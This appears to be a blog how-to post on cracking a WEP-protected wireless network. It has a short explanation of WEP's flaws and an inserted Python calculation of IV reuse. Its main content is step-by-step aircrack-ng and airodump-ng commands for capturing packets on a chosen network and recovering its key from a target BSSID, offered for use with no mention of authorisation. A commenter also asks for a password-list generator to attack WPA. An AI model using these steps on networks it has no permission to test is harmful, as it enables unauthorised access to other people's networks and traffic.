Howto: crack a wireless network with Wired Equivalent Privacy (WEP)


WEP was intended to provide comparable confidentiality to a traditional wired network (in particular it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts — any WEP key can be cracked with readily available software in two minutes or less — and WEP was superseded by Wi-Fi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping. (Wikipedia)

It is fairly easy to crack a WEP-encrypted wireless network. In fact, WEP has serious flaws in its design, flaws that make it quick and easy to crack.
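The design flaw behind those "serious flaws" is easy to quantify: WEP prepends a 24-bit initialization vector (IV) to every frame, so there are only 16,777,216 IVs per key, and any two frames that reuse an IV also reuse the same RC4 keystream. The birthday calculation below (an added example, not part of the original post or the aircrack-ng project) shows how few frames it takes before an IV repeat is likely, and why the roughly 500K IVs mentioned later in this post contain thousands of repeats; it assumes IVs are chosen uniformly at random, which is the best case for WEP.

```python
import math

IV_BITS = 24                 # WEP sends a 24-bit IV in the clear with every frame
IV_SPACE = 1 << IV_BITS      # 16,777,216 possible IV values per WEP key


def p_iv_repeat(n_frames: int, iv_space: int = IV_SPACE) -> float:
    """Probability that at least one IV value is reused among n_frames
    frames with uniformly random IVs (classic birthday bound, computed
    exactly in log space so it does not underflow for large n)."""
    if n_frames > iv_space:
        return 1.0                     # pigeonhole: a repeat is certain
    log_no_repeat = 0.0
    for i in range(n_frames):
        log_no_repeat += math.log1p(-i / iv_space)
    return 1.0 - math.exp(log_no_repeat)


def frames_until_repeat_likely(target: float = 0.5,
                               iv_space: int = IV_SPACE) -> int:
    """Smallest number of frames after which an IV repeat is at least
    `target` likely.  Accumulates the same product incrementally."""
    log_no_repeat = 0.0
    for n in range(1, iv_space + 1):
        log_no_repeat += math.log1p(-(n - 1) / iv_space)   # add frame n
        if 1.0 - math.exp(log_no_repeat) >= target:
            return n
    return iv_space + 1


def expected_repeated_pairs(n_frames: int, iv_space: int = IV_SPACE) -> float:
    """Expected number of frame pairs that share an IV: C(n, 2) / iv_space.
    Each such pair is a keystream reuse, the weakness the cracking tools exploit."""
    return n_frames * (n_frames - 1) / 2 / iv_space


if __name__ == "__main__":
    n50 = frames_until_repeat_likely(0.5)
    print(f"50% chance of an IV repeat after only {n50} frames")
    for n in (10_000, 100_000, 500_000):
        print(f"{n:>7} frames: P(repeat) = {p_iv_repeat(n):.6f}, "
              f"expected repeated pairs = {expected_repeated_pairs(n):.0f}")
```

A busy access point sends thousands of frames per minute, so in practice the IV space wraps long before a key would ever be rotated; this is why the only real mitigation is to replace WEP with WPA2 or WPA3, not to lengthen the key.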

Install aircrack-ng. On Debian or Ubuntu:

sudo apt-get install aircrack-ng

(or yum install aircrack-ng on Fedora)

Or get the source from the homepage. (SUSE users will have to build from source.)

Then start airodump-ng (part of the aircrack-ng suite) to look for wireless networks:

sudo airodump-ng eth1

Then note the channel number of the wireless network you want to crack.

Quit airodump-ng and start it again with that specific channel number so that it collects packets faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVs, and then try the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC address after the -b option is the BSSID of the target, and dump-01.cap is the file containing the captured packets.

One Comment

  1. thinkweird says:

    I used Backtrack2 for this purpose. WEP is easy after all, but WPA is hard. Do you happen to know a good and flexible password file generator?